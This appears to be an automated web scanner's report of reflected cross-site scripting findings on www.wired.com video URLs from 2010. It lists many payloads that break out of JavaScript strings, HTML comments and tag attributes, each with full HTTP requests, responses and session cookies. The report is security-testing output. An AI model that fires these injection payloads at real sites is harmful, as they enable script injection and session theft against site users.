<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos2a13f"><a>8f3c503be2f c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10a5c"-alert(1)-"9fe310adf50 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos10a5c"-alert(1)-"9fe310adf50/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=289 Expires: Mon, 22 Nov 2010 00:46:28 GMT Date: Mon, 22 Nov 2010 00:41:39 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106787
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccc48"-alert(1)-"092d67e8836 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latestccc48"-alert(1)-"092d67e8836/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:26 GMT Date: Mon, 22 Nov 2010 00:42:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106794
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea8c2"><a>b85cd2ddc5a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latestea8c2"><a>b85cd2ddc5a/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:46:41 GMT Date: Mon, 22 Nov 2010 00:41:41 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106755
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latestea8c2"><a>b85cd2ddc5a"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d93e"-alert(1)-"00159d9461f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/18158166335d93e"-alert(1)-"00159d9461f/glab-microsoft-kinect-fall-test-skyfire/660653903001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:38 GMT Date: Mon, 22 Nov 2010 00:42:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106759
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71d37"-alert(1)-"1aa3eddf2a9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire71d37"-alert(1)-"1aa3eddf2a9/660653903001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=278 Expires: Mon, 22 Nov 2010 00:47:34 GMT Date: Mon, 22 Nov 2010 00:42:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106695
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14c41"-alert(1)-"bd7540ba6f8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/66065390300114c41"-alert(1)-"bd7540ba6f8 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=298 Expires: Mon, 22 Nov 2010 00:48:10 GMT Date: Mon, 22 Nov 2010 00:43:12 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106695
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 80bd5--><script>alert(1)</script>b8bc6f2fc49 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video80bd5--><script>alert(1)</script>b8bc6f2fc49/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29466 Vary: Accept-Encoding Cache-Control: max-age=282 Expires: Mon, 22 Nov 2010 00:40:07 GMT Date: Mon, 22 Nov 2010 00:35:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video80bd5--><script>alert(1)</script>b8bc6f2fc49/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2dc5"><a>8169029ab92 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videoc2dc5"><a>8169029ab92/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29427 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:39:28 GMT Date: Mon, 22 Nov 2010 00:34:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videoc2dc5"><a>8169029ab92 ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee349"><a>f57f2580c56 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videosee349"><a>f57f2580c56/latest/1815816633/green-lantern-theatrical-trailer/680254055001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:40:27 GMT Date: Mon, 22 Nov 2010 00:35:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106702
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videosee349"><a>f57f2580c56 c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 279cd"-alert(1)-"6a5aa6c2954 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos279cd"-alert(1)-"6a5aa6c2954/latest/1815816633/green-lantern-theatrical-trailer/680254055001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:13 GMT Date: Mon, 22 Nov 2010 00:36:13 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106762
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1ce3"><a>3ba2576a594 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latestb1ce3"><a>3ba2576a594/1815816633/green-lantern-theatrical-trailer/680254055001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:15 GMT Date: Mon, 22 Nov 2010 00:36:15 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106702
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latestb1ce3"><a>3ba2576a594"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21049"-alert(1)-"98b0f0a9714 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest21049"-alert(1)-"98b0f0a9714/1815816633/green-lantern-theatrical-trailer/680254055001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=298 Expires: Mon, 22 Nov 2010 00:42:04 GMT Date: Mon, 22 Nov 2010 00:37:06 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106716
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fdfee"-alert(1)-"dab3706a883 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633fdfee"-alert(1)-"dab3706a883/green-lantern-theatrical-trailer/680254055001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:16 GMT Date: Mon, 22 Nov 2010 00:37:16 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e01ee"-alert(1)-"5b4f05ec285 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/green-lantern-theatrical-trailere01ee"-alert(1)-"5b4f05ec285/680254055001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:24 GMT Date: Mon, 22 Nov 2010 00:37:24 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106734
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a0a0"-alert(1)-"b92fb7546c6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/6802540550014a0a0"-alert(1)-"b92fb7546c6 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=273 Expires: Mon, 22 Nov 2010 00:42:08 GMT Date: Mon, 22 Nov 2010 00:37:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106779
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5536"><a>da764d97e81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videod5536"><a>da764d97e81/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29423 Vary: Accept-Encoding Cache-Control: max-age=299 Expires: Mon, 22 Nov 2010 00:41:28 GMT Date: Mon, 22 Nov 2010 00:36:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videod5536"><a>da764d97e81 ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 83275--><script>alert(1)</script>e5a9bbeecef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video83275--><script>alert(1)</script>e5a9bbeecef/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29462 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:03 GMT Date: Mon, 22 Nov 2010 00:37:03 GMT Connection: close
